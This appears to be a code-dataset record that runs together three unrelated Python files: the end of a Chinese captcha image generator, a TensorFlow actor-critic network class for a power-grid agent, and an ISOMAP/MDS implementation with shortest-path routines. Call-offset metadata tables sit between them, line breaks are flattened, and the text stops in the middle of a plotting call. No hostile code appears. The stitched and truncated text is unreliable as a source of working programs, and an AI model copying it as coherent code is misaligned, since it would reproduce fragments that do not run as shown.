# 创建干扰虚构文字 if self.enable_dummy_word: captcha_info = self.add_dummy_word() self.label_string.update(captcha_info) def running_time(self, time): m = time / 60 h = m / 60 if m > 1: if h > 1: return str('%.2f' % h) + 'h' else: return str('%.2f' % m) + 'm' else: return str('%.2f' % time) + 's' def create_image_by_batch(self, count=5): """ 生成指定数量的图片 :param count: :return: """ strat_time = time.time() if not self.set_font: raise ConfigError("请先设置字体") if self.label_type in ("xml", "json"): pass else: raise ConfigError("标签文件的格式只能为xml或者json") self.enable_save_status = True # 判断文件夹是否存在 if not os.path.exists(self.save_img_dir): os.makedirs(self.save_img_dir) if not os.path.exists(self.save_label_dir): os.makedirs(self.save_label_dir) number = count time_list = [] for i in range(count): strats_time = time.time() number -= 1 self.create_image(i) # 保存图片 if self.enable_save_status: self.save_this_image(i) end_time = time.time() time_data = end_time - strats_time time_list.append(time_data) print(f'已耗时: {self.running_time(end_time - strat_time)}') print(f'预计耗时: {self.running_time((np.mean(time_list)) * number)}') def show(self): """ 展示图片 :return: """ if not self.set_font: raise ConfigError("请先设置字体") self.img.show() print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@") print("captcha info: {}".format(self.label_string)) print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@") def save(self, path="test.jpg"): """ 保存图片 :param path: :return: """ if not self.set_font: raise ConfigError("请先设置字体") self.img.save(path) print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@") print("captcha info: {}".format(self.label_string)) print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@") if __name__ == '__main__': # 创建对象 c = ClickCaptcha() c.font_settings(word_size=32, font_path="msyh.ttf", word_list_file_path="chinese_word.json") c.width = 416 # 宽度 c.height = 416 # 高度 # 配置开关 c.enable_add_text = True # 添加文字 # 模板路径 c.template_path = "exp.xml" c.enable_interference_line = True # 添加干扰线 c.enable_dummy_word = False # 添加虚构文字对象 c.create_image_by_batch(20)
[ "jinja2.Template", "PIL.Image.new", "json.load", "random.randint", "os.makedirs", "os.getcwd", "os.path.exists", "random.choice", "json.dumps", "time.time", "PIL.ImageFont.truetype", "numpy.mean", "PIL.ImageDraw.Draw", "os.path.join" ]
[((313, 324), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (322, 324), False, 'import os\n'), ((1758, 1798), 'os.path.join', 'os.path.join', (['self.basedir', '"""JPEGImages"""'], {}), "(self.basedir, 'JPEGImages')\n", (1770, 1798), False, 'import os\n'), ((1829, 1870), 'os.path.join', 'os.path.join', (['self.basedir', '"""Annotations"""'], {}), "(self.basedir, 'Annotations')\n", (1841, 1870), False, 'import os\n'), ((3288, 3317), 'random.choice', 'random.choice', (['self.word_list'], {}), '(self.word_list)\n', (3301, 3317), False, 'import random\n'), ((3447, 3469), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3461, 3469), False, 'import random\n'), ((3482, 3505), 'random.randint', 'random.randint', (['(50)', '(255)'], {}), '(50, 255)\n', (3496, 3505), False, 'import random\n'), ((3518, 3541), 'random.randint', 'random.randint', (['(50)', '(255)'], {}), '(50, 255)\n', (3532, 3541), False, 'import random\n'), ((3688, 3710), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3702, 3710), False, 'import random\n'), ((3723, 3745), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3737, 3745), False, 'import random\n'), ((3758, 3780), 'random.randint', 'random.randint', (['(0)', '(255)'], {}), '(0, 255)\n', (3772, 3780), False, 'import random\n'), ((4653, 4711), 'PIL.Image.new', 'Image.new', (['self.mode', '(self.width, self.height)', '(0, 0, 0)'], {}), '(self.mode, (self.width, self.height), (0, 0, 0))\n', (4662, 4711), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((4870, 4894), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', (['self.img'], {}), '(self.img)\n', (4884, 4894), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((7511, 7567), 'random.randint', 'random.randint', (['self.inter_line_min', 'self.inter_line_max'], {}), '(self.inter_line_min, self.inter_line_max)\n', (7525, 7567), False, 'import random\n'), ((8395, 8463), 'random.randint', 'random.randint', (['self.dummy_word_count_min', 'self.dummy_word_count_max'], {}), '(self.dummy_word_count_min, self.dummy_word_count_max)\n', (8409, 8463), False, 'import random\n'), ((10577, 10618), 'os.path.join', 'os.path.join', (['self.save_img_dir', 'img_file'], {}), '(self.save_img_dir, img_file)\n', (10589, 10618), False, 'import os\n'), ((10757, 10802), 'os.path.join', 'os.path.join', (['self.save_label_dir', 'label_file'], {}), '(self.save_label_dir, label_file)\n', (10769, 10802), False, 'import os\n'), ((11331, 11367), 'os.path.join', 'os.path.join', (['self.basedir', 'img_path'], {}), '(self.basedir, img_path)\n', (11343, 11367), False, 'import os\n'), ((13200, 13256), 'random.randint', 'random.randint', (['self.word_count_min', 'self.word_count_max'], {}), '(self.word_count_min, self.word_count_max)\n', (13214, 13256), False, 'import random\n'), ((14090, 14101), 'time.time', 'time.time', ([], {}), '()\n', (14099, 14101), False, 'import time\n'), ((2751, 2801), 'PIL.ImageFont.truetype', 'ImageFont.truetype', (['self.font_path', 'self.word_size'], {}), '(self.font_path, self.word_size)\n', (2769, 2801), False, 'from PIL import Image, ImageDraw, ImageFont\n'), ((5289, 5365), 'random.randint', 'random.randint', (['self.width_left_offset', '(self.width - self.width_right_offset)'], {}), '(self.width_left_offset, self.width - self.width_right_offset)\n', (5303, 5365), False, 'import random\n'), ((5391, 5470), 'random.randint', 'random.randint', (['self.height_top_offset', '(self.height - self.height_bottom_offset)'], {}), '(self.height_top_offset, self.height - self.height_bottom_offset)\n', (5405, 5470), False, 'import random\n'), ((7618, 7694), 'random.randint', 'random.randint', (['self.width_left_offset', '(self.width - self.width_right_offset)'], {}), '(self.width_left_offset, self.width - self.width_right_offset)\n', (7632, 7694), False, 'import random\n'), ((7716, 7795), 'random.randint', 'random.randint', (['self.height_top_offset', '(self.height - self.height_bottom_offset)'], {}), '(self.height_top_offset, self.height - self.height_bottom_offset)\n', (7730, 7795), False, 'import random\n'), ((7824, 7870), 'random.randint', 'random.randint', (['*self.interference_line_radius'], {}), '(*self.interference_line_radius)\n', (7838, 7870), False, 'import random\n'), ((7899, 7945), 'random.randint', 'random.randint', (['*self.interference_line_radius'], {}), '(*self.interference_line_radius)\n', (7913, 7945), False, 'import random\n'), ((8537, 8609), 'random.randint', 'random.randint', (['self.dummy_word_strokes_min', 'self.dummy_word_strokes_max'], {}), '(self.dummy_word_strokes_min, self.dummy_word_strokes_max)\n', (8551, 8609), False, 'import random\n'), ((8837, 8892), 'random.randint', 'random.randint', (['location_x', '(location_x + self.word_size)'], {}), '(location_x, location_x + self.word_size)\n', (8851, 8892), False, 'import random\n'), ((8916, 8971), 'random.randint', 'random.randint', (['location_y', '(location_y + self.word_size)'], {}), '(location_y, location_y + self.word_size)\n', (8930, 8971), False, 'import random\n'), ((12550, 12571), 'jinja2.Template', 'Template', (['before_data'], {}), '(before_data)\n', (12558, 12571), False, 'from jinja2 import Template\n'), ((14378, 14411), 'os.path.exists', 'os.path.exists', (['self.save_img_dir'], {}), '(self.save_img_dir)\n', (14392, 14411), False, 'import os\n'), ((14425, 14455), 'os.makedirs', 'os.makedirs', (['self.save_img_dir'], {}), '(self.save_img_dir)\n', (14436, 14455), False, 'import os\n'), ((14471, 14506), 'os.path.exists', 'os.path.exists', (['self.save_label_dir'], {}), '(self.save_label_dir)\n', (14485, 14506), False, 'import os\n'), ((14520, 14552), 'os.makedirs', 'os.makedirs', (['self.save_label_dir'], {}), '(self.save_label_dir)\n', (14531, 14552), False, 'import os\n'), ((14656, 14667), 'time.time', 'time.time', ([], {}), '()\n', (14665, 14667), False, 'import time\n'), ((14847, 14858), 'time.time', 'time.time', ([], {}), '()\n', (14856, 14858), False, 'import time\n'), ((3134, 3146), 'json.load', 'json.load', (['f'], {}), '(f)\n', (3143, 3146), False, 'import json\n'), ((9299, 9319), 'random.randint', 'random.randint', (['(1)', '(6)'], {}), '(1, 6)\n', (9313, 9319), False, 'import random\n'), ((10930, 10989), 'json.dumps', 'json.dumps', (['self.label_string'], {'ensure_ascii': '(False)', 'indent': '(4)'}), '(self.label_string, ensure_ascii=False, indent=4)\n', (10940, 10989), False, 'import json\n'), ((10443, 10454), 'time.time', 'time.time', ([], {}), '()\n', (10452, 10454), False, 'import time\n'), ((15070, 15088), 'numpy.mean', 'np.mean', (['time_list'], {}), '(time_list)\n', (15077, 15088), True, 'import numpy as np\n')]
import os import numpy as np import tensorflow as tf import tensorflow.keras as tfk import tensorflow.keras.backend as K import tensorflow.keras.models as tfkm import tensorflow.keras.optimizers as tfko import tensorflow.keras.layers as tfkl import tensorflow.keras.activations as tfka import tensorflow.keras.initializers as tfki from WolperGrid_Config import WolperGrid_Config as cfg uniform_initializerA = tfki.VarianceScaling( distribution='uniform', mode='fan_out', scale=0.333) uniform_initializerB = tfki.GlorotNormal() uniform_initializerC = tfki.HeNormal() kernel_init = uniform_initializerC class WolperGrid_NN(object): def __init__(self, gridobj, observation_size, proto_size, is_training = False): self.input_size = observation_size self.topo_size = gridobj.dim_topo self.n_line = gridobj.n_line self.disp_size = gridobj.n_gen self.is_training = is_training self.proto_size = proto_size self.obs_nn = False if self.obs_nn == True: self.obs_size = 2048 else: self.obs_size = self.input_size # AC models self.obs = None self.actor = None self.critic = None self.construct_wg_obs() self.construct_wg_actor() self.construct_wg_critic() def construct_resmlp(self, layer_in, hidden_size, num_blocks, name="resmlp"): layer_name = "{}-resmlp-fc0".format(name) layer_w = tfkl.Dense(hidden_size, kernel_initializer=kernel_init, name=layer_name)(layer_in) for block in range(num_blocks): layer_name = "{}-resmlp-fc{}-0".format(name, block) layer1 = tfkl.Dense(hidden_size, kernel_initializer=kernel_init, name=layer_name)(layer_w) layer1 = tf.nn.tanh(layer1) layer_name = "{}-resmlp-fc{}-1".format(name, block) layer2 = tfkl.Dense(hidden_size, kernel_initializer=kernel_init, name=layer_name)(layer1) ln_name = "{}-ln-{}".format(name, block) ln = tfkl.LayerNormalization(trainable=self.is_training, name=ln_name) layer_ln = ln(layer2 + layer_w) layer_w = layer_ln return layer_w def construct_mlp(self, layer_in, layer_sizes, name="mlp", layer_norm=True, activation=tf.nn.elu, activation_final=None): if layer_norm: pre_name = "{}-ln-fc".format(name) layer = tfkl.Dense(layer_sizes[0], kernel_initializer=kernel_init, name=pre_name)(layer_in) ln_name = "{}-ln".format(name) ln = tfkl.LayerNormalization(trainable=self.is_training, name=ln_name) layer = ln(layer, training=self.is_training) th_name = "{}-tanh".format(name) layer = tf.nn.tanh(layer, name=th_name) size_index = 1 else: size_index = 0 layer = layer_in for i, size in enumerate(layer_sizes[size_index:-1]): layer_name = "{}-fc-{}".format(name, i + 1) layer = tfkl.Dense(size, kernel_initializer=kernel_init, name=layer_name)(layer) # Add activation if provided if activation is not None: activation_name = "{}-act-{}".format(name, i + 1) layer = activation(layer, name=activation_name) # Final layer layer_name = "{}-fc-{}".format(name, "final") layer_final = tfkl.Dense(layer_sizes[-1], kernel_initializer=kernel_init, name=layer_name)(layer) if activation_final is not None: activation_name = "{}-act-{}".format(name, "final") layer_final = activation_final(layer_final, name=activation_name) # Return final return layer_final def construct_wg_obs(self): input_shape = (self.input_size,) input_obs = tfk.Input(dtype=tf.float32, shape=input_shape, name='input_obs') ## MLP variant if self.obs_nn: layer_n = 8 layer_idxs = np.arange(layer_n) layer_range = [0, layer_n - 1] size_range = [ self.input_size, self.obs_size ] sizes_np = np.interp(layer_idxs, layer_range, size_range) sizes = list(sizes_np) output_obs = self.construct_mlp(input_obs, sizes, name="obs", layer_norm=True, activation=tf.nn.elu, activation_final=tf.nn.elu) else: ## Disabled variant output_obs = tfka.linear(input_obs) obs_inputs = [input_obs] obs_outputs = [output_obs] self.obs = tfk.Model(inputs=obs_inputs, outputs=obs_outputs, name="obs_" + self.__class__.__name__) self.obs_opt = tfko.Adam(lr=cfg.LR_CRITIC) self.obs.compile(loss="mse", optimizer=self.obs_opt) def construct_wg_actor(self): # Defines input tensors and scalars input_shape = (self.obs_size,) input_obs = tfk.Input(dtype=tf.float32, shape=input_shape, name='actor_obs') # Forward encode ## MLP variant layer_n = 8 layer_idxs = np.arange(layer_n) layer_range = [0, layer_n - 2, layer_n - 1] size_range = [ self.obs_size, 128, self.proto_size ] sizes_np = np.interp(layer_idxs, layer_range, size_range) sizes = list(sizes_np.astype(int)) proto = self.construct_mlp(input_obs, sizes, name="actor-mlp", layer_norm=True, activation=tf.nn.elu, activation_final=tf.nn.tanh) ## Residual MLP variant #proto_mlp = self.construct_resmlp(input_obs, # 1024, 5, # name="actor-res-mlp") #proto_top0 = tfkl.Dense(1024, # kernel_initializer=kernel_init, # name="proto-fc1")(proto_mlp) #proto_top1 = tf.nn.elu(proto_top0) #proto_top2 = tfkl.Dense(1024, # kernel_initializer=kernel_init, # name="proto-fc2")(proto_top1) #proto_top3 = tf.nn.elu(proto_top2) #proto_top4 = tfkl.Dense(self.proto_size, # kernel_initializer=kernel_init, # name="proto-fc3")(proto_top3) #proto = tf.nn.tanh(proto_top4) # L2 Normalize actor output #proto, _ = tf.linalg.normalize(proto, axis=-1, name="actor-norm") # Backwards pass actor_inputs = [ input_obs ] actor_outputs = [ proto ] self.actor = tfk.Model(inputs=actor_inputs, outputs=actor_outputs, name="actor_" + self.__class__.__name__) self.actor_opt = tfko.Adam(lr=cfg.LR_ACTOR) self.actor.compile(loss="mse", optimizer=self.actor_opt) def construct_wg_critic(self): input_obs_shape = (self.obs_size,) input_obs = tfk.Input(dtype=tf.float32, shape=input_obs_shape, name='critic_obs') input_proto_shape = (self.proto_size,) input_proto = tfk.Input(dtype=tf.float32, shape=input_proto_shape, name='critic_proto') input_concat = tf.concat([input_obs, input_proto], axis=-1, name="critic_concat") # Forward pass ## MLP variant layer_n = 6 layer_idxs = np.arange(layer_n) layer_range = [0, layer_n - 2, layer_n - 1] size_range = [ 1024, 128, 1 ] sizes_np = np.interp(layer_idxs, layer_range, size_range) sizes = list(sizes_np.astype(int)) Q = self.construct_mlp(input_concat, sizes, name="critic-mlp", layer_norm=False, activation=tf.nn.elu, activation_final=None) ## Residual MLP variant #Q_mlp = self.construct_resmlp(input_concat, 1024, 8, "critic") #Q_top0 = tfkl.Dense(512)(Q_mlp) #Q_top1 = tf.nn.elu(Q_top0) #Q_top2 = tfkl.Dense(256)(Q_top1) #Q_top3 = tf.nn.elu(Q_top2) #Q_top4 = tfkl.Dense(256)(Q_top3) #Q = tfkl.Dense(1)(Q_top4) # Backwards pass critic_inputs = [ input_obs, input_proto ] critic_outputs = [ Q ] self.critic = tfk.Model(inputs=critic_inputs, outputs=critic_outputs, name="critic_" + self.__class__.__name__) # Keras model self.critic_opt = tfko.Adam(lr=cfg.LR_CRITIC) self.critic.compile(loss="mse", optimizer=self.critic_opt) @staticmethod def update_target_hard(source_model, target_model): # Get parameters to update target_params = target_model.variables source_params = source_model.variables # Update each param for src, dest in zip(source_params, target_params): dest.assign(src) @staticmethod def update_target_soft(source_model, target_model, tau=1e-3): tau_inv = 1.0 - tau # Get parameters to update target_params = target_model.variables source_params = source_model.variables # Update each param for src, dest in zip(source_params, target_params): # Polyak averaging var_update = src.value() * tau var_persist = dest.value() * tau_inv dest.assign(var_update + var_persist) def save_network(self, path): # Saves model at specified path # Compute paths obs_path = os.path.join(path, "obs.tf") actor_path = os.path.join(path, "actor.tf") critic_path = os.path.join(path, "critic.tf") self.obs.save_weights(obs_path) self.actor.save_weights(actor_path) self.critic.save_weights(critic_path) print("Successfully saved model at: {}".format(path)) def load_network(self, path): # Compute paths obs_path = os.path.join(path, "obs.tf") actor_path = os.path.join(path, "actor.tf") critic_path = os.path.join(path, "critic.tf") self.obs.load_weights(obs_path) self.actor.load_weights(actor_path) self.critic.load_weights(critic_path) print("Succesfully loaded network from: {}".format(path))
[ "tensorflow.keras.layers.Dense", "tensorflow.nn.tanh", "tensorflow.keras.activations.linear", "tensorflow.keras.Input", "tensorflow.keras.initializers.HeNormal", "tensorflow.keras.layers.LayerNormalization", "tensorflow.concat", "tensorflow.keras.initializers.GlorotNormal", "tensorflow.keras.Model", "tensorflow.keras.initializers.VarianceScaling", "tensorflow.keras.optimizers.Adam", "numpy.arange", "numpy.interp", "os.path.join" ]
[((412, 485), 'tensorflow.keras.initializers.VarianceScaling', 'tfki.VarianceScaling', ([], {'distribution': '"""uniform"""', 'mode': '"""fan_out"""', 'scale': '(0.333)'}), "(distribution='uniform', mode='fan_out', scale=0.333)\n", (432, 485), True, 'import tensorflow.keras.initializers as tfki\n'), ((522, 541), 'tensorflow.keras.initializers.GlorotNormal', 'tfki.GlorotNormal', ([], {}), '()\n', (539, 541), True, 'import tensorflow.keras.initializers as tfki\n'), ((565, 580), 'tensorflow.keras.initializers.HeNormal', 'tfki.HeNormal', ([], {}), '()\n', (578, 580), True, 'import tensorflow.keras.initializers as tfki\n'), ((4590, 4654), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_shape', 'name': '"""input_obs"""'}), "(dtype=tf.float32, shape=input_shape, name='input_obs')\n", (4599, 4654), True, 'import tensorflow.keras as tfk\n'), ((5613, 5706), 'tensorflow.keras.Model', 'tfk.Model', ([], {'inputs': 'obs_inputs', 'outputs': 'obs_outputs', 'name': "('obs_' + self.__class__.__name__)"}), "(inputs=obs_inputs, outputs=obs_outputs, name='obs_' + self.\n __class__.__name__)\n", (5622, 5706), True, 'import tensorflow.keras as tfk\n'), ((5784, 5811), 'tensorflow.keras.optimizers.Adam', 'tfko.Adam', ([], {'lr': 'cfg.LR_CRITIC'}), '(lr=cfg.LR_CRITIC)\n', (5793, 5811), True, 'import tensorflow.keras.optimizers as tfko\n'), ((6011, 6075), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_shape', 'name': '"""actor_obs"""'}), "(dtype=tf.float32, shape=input_shape, name='actor_obs')\n", (6020, 6075), True, 'import tensorflow.keras as tfk\n'), ((6227, 6245), 'numpy.arange', 'np.arange', (['layer_n'], {}), '(layer_n)\n', (6236, 6245), True, 'import numpy as np\n'), ((6422, 6468), 'numpy.interp', 'np.interp', (['layer_idxs', 'layer_range', 'size_range'], {}), '(layer_idxs, layer_range, size_range)\n', (6431, 6468), True, 'import numpy as np\n'), ((7900, 7999), 'tensorflow.keras.Model', 'tfk.Model', ([], {'inputs': 'actor_inputs', 'outputs': 'actor_outputs', 'name': "('actor_' + self.__class__.__name__)"}), "(inputs=actor_inputs, outputs=actor_outputs, name='actor_' + self.\n __class__.__name__)\n", (7909, 7999), True, 'import tensorflow.keras as tfk\n'), ((8082, 8108), 'tensorflow.keras.optimizers.Adam', 'tfko.Adam', ([], {'lr': 'cfg.LR_ACTOR'}), '(lr=cfg.LR_ACTOR)\n', (8091, 8108), True, 'import tensorflow.keras.optimizers as tfko\n'), ((8273, 8342), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_obs_shape', 'name': '"""critic_obs"""'}), "(dtype=tf.float32, shape=input_obs_shape, name='critic_obs')\n", (8282, 8342), True, 'import tensorflow.keras as tfk\n'), ((8472, 8545), 'tensorflow.keras.Input', 'tfk.Input', ([], {'dtype': 'tf.float32', 'shape': 'input_proto_shape', 'name': '"""critic_proto"""'}), "(dtype=tf.float32, shape=input_proto_shape, name='critic_proto')\n", (8481, 8545), True, 'import tensorflow.keras as tfk\n'), ((8634, 8700), 'tensorflow.concat', 'tf.concat', (['[input_obs, input_proto]'], {'axis': '(-1)', 'name': '"""critic_concat"""'}), "([input_obs, input_proto], axis=-1, name='critic_concat')\n", (8643, 8700), True, 'import tensorflow as tf\n'), ((8822, 8840), 'numpy.arange', 'np.arange', (['layer_n'], {}), '(layer_n)\n', (8831, 8840), True, 'import numpy as np\n'), ((8994, 9040), 'numpy.interp', 'np.interp', (['layer_idxs', 'layer_range', 'size_range'], {}), '(layer_idxs, layer_range, size_range)\n', (9003, 9040), True, 'import numpy as np\n'), ((9840, 9941), 'tensorflow.keras.Model', 'tfk.Model', ([], {'inputs': 'critic_inputs', 'outputs': 'critic_outputs', 'name': "('critic_' + self.__class__.__name__)"}), "(inputs=critic_inputs, outputs=critic_outputs, name='critic_' +\n self.__class__.__name__)\n", (9849, 9941), True, 'import tensorflow.keras as tfk\n'), ((10050, 10077), 'tensorflow.keras.optimizers.Adam', 'tfko.Adam', ([], {'lr': 'cfg.LR_CRITIC'}), '(lr=cfg.LR_CRITIC)\n', (10059, 10077), True, 'import tensorflow.keras.optimizers as tfko\n'), ((11090, 11118), 'os.path.join', 'os.path.join', (['path', '"""obs.tf"""'], {}), "(path, 'obs.tf')\n", (11102, 11118), False, 'import os\n'), ((11140, 11170), 'os.path.join', 'os.path.join', (['path', '"""actor.tf"""'], {}), "(path, 'actor.tf')\n", (11152, 11170), False, 'import os\n'), ((11193, 11224), 'os.path.join', 'os.path.join', (['path', '"""critic.tf"""'], {}), "(path, 'critic.tf')\n", (11205, 11224), False, 'import os\n'), ((11496, 11524), 'os.path.join', 'os.path.join', (['path', '"""obs.tf"""'], {}), "(path, 'obs.tf')\n", (11508, 11524), False, 'import os\n'), ((11546, 11576), 'os.path.join', 'os.path.join', (['path', '"""actor.tf"""'], {}), "(path, 'actor.tf')\n", (11558, 11576), False, 'import os\n'), ((11599, 11630), 'os.path.join', 'os.path.join', (['path', '"""critic.tf"""'], {}), "(path, 'critic.tf')\n", (11611, 11630), False, 'import os\n'), ((1637, 1709), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['hidden_size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(hidden_size, kernel_initializer=kernel_init, name=layer_name)\n', (1647, 1709), True, 'import tensorflow.keras.layers as tfkl\n'), ((2071, 2089), 'tensorflow.nn.tanh', 'tf.nn.tanh', (['layer1'], {}), '(layer1)\n', (2081, 2089), True, 'import tensorflow as tf\n'), ((2390, 2455), 'tensorflow.keras.layers.LayerNormalization', 'tfkl.LayerNormalization', ([], {'trainable': 'self.is_training', 'name': 'ln_name'}), '(trainable=self.is_training, name=ln_name)\n', (2413, 2455), True, 'import tensorflow.keras.layers as tfkl\n'), ((3151, 3216), 'tensorflow.keras.layers.LayerNormalization', 'tfkl.LayerNormalization', ([], {'trainable': 'self.is_training', 'name': 'ln_name'}), '(trainable=self.is_training, name=ln_name)\n', (3174, 3216), True, 'import tensorflow.keras.layers as tfkl\n'), ((3380, 3411), 'tensorflow.nn.tanh', 'tf.nn.tanh', (['layer'], {'name': 'th_name'}), '(layer, name=th_name)\n', (3390, 3411), True, 'import tensorflow as tf\n'), ((4092, 4168), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['layer_sizes[-1]'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(layer_sizes[-1], kernel_initializer=kernel_init, name=layer_name)\n', (4102, 4168), True, 'import tensorflow.keras.layers as tfkl\n'), ((4811, 4829), 'numpy.arange', 'np.arange', (['layer_n'], {}), '(layer_n)\n', (4820, 4829), True, 'import numpy as np\n'), ((5000, 5046), 'numpy.interp', 'np.interp', (['layer_idxs', 'layer_range', 'size_range'], {}), '(layer_idxs, layer_range, size_range)\n', (5009, 5046), True, 'import numpy as np\n'), ((5502, 5524), 'tensorflow.keras.activations.linear', 'tfka.linear', (['input_obs'], {}), '(input_obs)\n', (5513, 5524), True, 'import tensorflow.keras.activations as tfka\n'), ((1904, 1976), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['hidden_size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(hidden_size, kernel_initializer=kernel_init, name=layer_name)\n', (1914, 1976), True, 'import tensorflow.keras.layers as tfkl\n'), ((2175, 2247), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['hidden_size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(hidden_size, kernel_initializer=kernel_init, name=layer_name)\n', (2185, 2247), True, 'import tensorflow.keras.layers as tfkl\n'), ((2945, 3018), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['layer_sizes[0]'], {'kernel_initializer': 'kernel_init', 'name': 'pre_name'}), '(layer_sizes[0], kernel_initializer=kernel_init, name=pre_name)\n', (2955, 3018), True, 'import tensorflow.keras.layers as tfkl\n'), ((3648, 3713), 'tensorflow.keras.layers.Dense', 'tfkl.Dense', (['size'], {'kernel_initializer': 'kernel_init', 'name': 'layer_name'}), '(size, kernel_initializer=kernel_init, name=layer_name)\n', (3658, 3713), True, 'import tensorflow.keras.layers as tfkl\n')]
#!/usr/bin/env python # -*- coding: utf-8 -*- # author: 11360 # datetime: 2021/3/14 13:41 import matplotlib.pyplot as plt import numpy as np from sklearn.datasets import make_swiss_roll from scipy.spatial import KDTree import mpl_toolkits.mplot3d.axes3d as p3 from sklearn.cluster import AgglomerativeClustering class ShortestPath: @staticmethod def floyd_algorithm(adjacency_matrix): """ 给定一张有向带权图的邻接矩阵,求任意两点之间的最短路径 :param adjacency_matrix: 邻接矩阵,第i行j列的数代表从xi到xj的邻接距离 :return: 最短距离矩阵,路径矩阵 """ n = adjacency_matrix.shape[0] path_matrix = -np.ones([n, n], dtype=int) dist_matrix = adjacency_matrix.copy() print("adjacency_matrix = ", adjacency_matrix) n = path_matrix.shape[0] for v in range(n): # 途经点循环 for i in range(n): for j in range(n): if dist_matrix[i, j] > dist_matrix[i, v] + dist_matrix[v, j]: dist_matrix[i, j] = dist_matrix[i, v] + dist_matrix[v, j] path_matrix[i, j] = v return dist_matrix, path_matrix @staticmethod def print_floyd_path(path_matrix, source, destination): if path_matrix[source, destination] < 0: print("<{}, {}>".format(source, destination)) return else: # 中间经过节点 mid = path_matrix[source, destination] ShortestPath.print_floyd_path(path_matrix, source, mid) ShortestPath.print_floyd_path(path_matrix, mid, destination) @staticmethod def djikstra_algorithm(adjacency_matrix, obj_vertice): n = adjacency_matrix.shape[0] musk_lst = [False for _ in range(n)] dist_lst = [np.inf for _ in range(n)] parent_lst = [-1 for _ in range(n)] src_vertice = obj_vertice dist_lst[src_vertice] = 0 while False in musk_lst: musk_lst[src_vertice] = True for i in range(n): if adjacency_matrix[src_vertice, i] != np.inf: if dist_lst[src_vertice] + adjacency_matrix[src_vertice, i] < dist_lst[i]: dist_lst[i] = dist_lst[src_vertice] + adjacency_matrix[src_vertice, i] parent_lst[i] = src_vertice min_dist = np.inf for j in range(n): if musk_lst[j] == False and dist_lst[j] < min_dist: min_dist = dist_lst[j] src_vertice = j print(dist_lst) print(parent_lst) return dist_lst, parent_lst @staticmethod def print_djikstra_path(parent_lst, obj_vertex): # 从源节点到目标节点(obj_vertex)的路径 a = obj_vertex lst = [] while parent_lst[a] != -1: lst.append(parent_lst[a]) a = parent_lst[a] lst.reverse() print("lst = ", lst) for i in lst: print(i, "->") print(obj_vertex) class ISOMAP: def __init__(self, k): """ :param k: reduced dimension R^d -> R^k """ self.reduced_dimension = k def make_data(self): self.X_data, t = make_swiss_roll(1000, noise=0, random_state=0) ward = AgglomerativeClustering(n_clusters=6, linkage='ward').fit(self.X_data) self.Y_data = ward.labels_ def construct_graph(self, k): """ :param k: k-nearest neighbour :return: adjacency matrix """ kd_tree = KDTree(self.X_data.copy()) n = self.X_data.shape[0] adjacency_matrix = np.ones([n, n]) * np.inf for i in range(n): # 由于最近邻查询邻居包含自身,需要去除 dist_tuple, index_tuple = kd_tree.query(self.X_data[i, :], k=k+1, p=2) dist_lst = list(dist_tuple) index_lst = list(index_tuple) remove_index = index_lst.index(i) print(i, index_lst[remove_index]) dist_lst.pop(remove_index) index_lst.pop(remove_index) for index, value in enumerate(index_lst): adjacency_matrix[i, value] = dist_tuple[index] return adjacency_matrix def Isomap(self, knn=5): adjacency_matrix = self.construct_graph(knn) dist_matrix, _ = ShortestPath.floyd_algorithm(adjacency_matrix) self.D = dist_matrix print("self.D = ", self.D) self.MDS() def MDS(self): self.B = self.construct_innerprod_matrix() if self.B is None: return # A是对角阵,Q是特征向量矩阵 # 由于内积矩阵是对称半正定矩阵,用svd求特征值、特征向量 u, sigma, vT = np.linalg.svd(self.B) Qk = u[:, :self.reduced_dimension] Ak = np.diag(sigma[:self.reduced_dimension] ** 0.5) self.new_data = Qk @ Ak print("new_data.shape = ", self.new_data.shape) def construct_innerprod_matrix(self): inf_ = np.where(self.D == np.inf) if inf_[0].shape[0] != 0: print("shape = ", self.D.shape) print("not connected graph!", self.D[inf_]) return innerprod_matrix = np.zeros(self.D.shape) length = self.D.shape[0] meandist2 = np.mean(list(map(lambda x: x**2, self.D))) meandist2_column_lst = [] for j in range(length): meandist2_column_lst.append(np.mean(list(map(lambda x: x**2, self.D[:, j])))) for i in range(length): meandist2_i_row = np.mean(list(map(lambda x: x**2, self.D[i, :]))) for j in range(i, length): meandist2_j_column = meandist2_column_lst[j] innerprod_matrix[i, j] = -0.5 * (self.D[i, j] ** 2 - meandist2_i_row - meandist2_j_column + meandist2) innerprod_matrix[j, i] = innerprod_matrix[i, j] return innerprod_matrix def result(self): fig = plt.figure() # plt.title("Origin data") ax = p3.Axes3D(fig) ax.view_init(7, -80) for l in np.unique(self.Y_data): ax.scatter(self.X_data[self.Y_data == l, 0], self.X_data[self.Y_data == l, 1], self.X_data[self.Y_data == l, 2], color=plt.cm.jet(float(l) / np.max(self.Y_data + 1)), s=20, edgecolor='k') plt.show() # ax = plt.gca() # ax.axis("equal") plt.figure() plt.title("MDS") if self.reduced_dimension == 2: print("self.new_data = ", self.new_data) for l in np.unique(self.Y_data): plt.scatter(self.new_data[self.Y_data == l, 0], self.new_data[self.Y_data == l, 1], 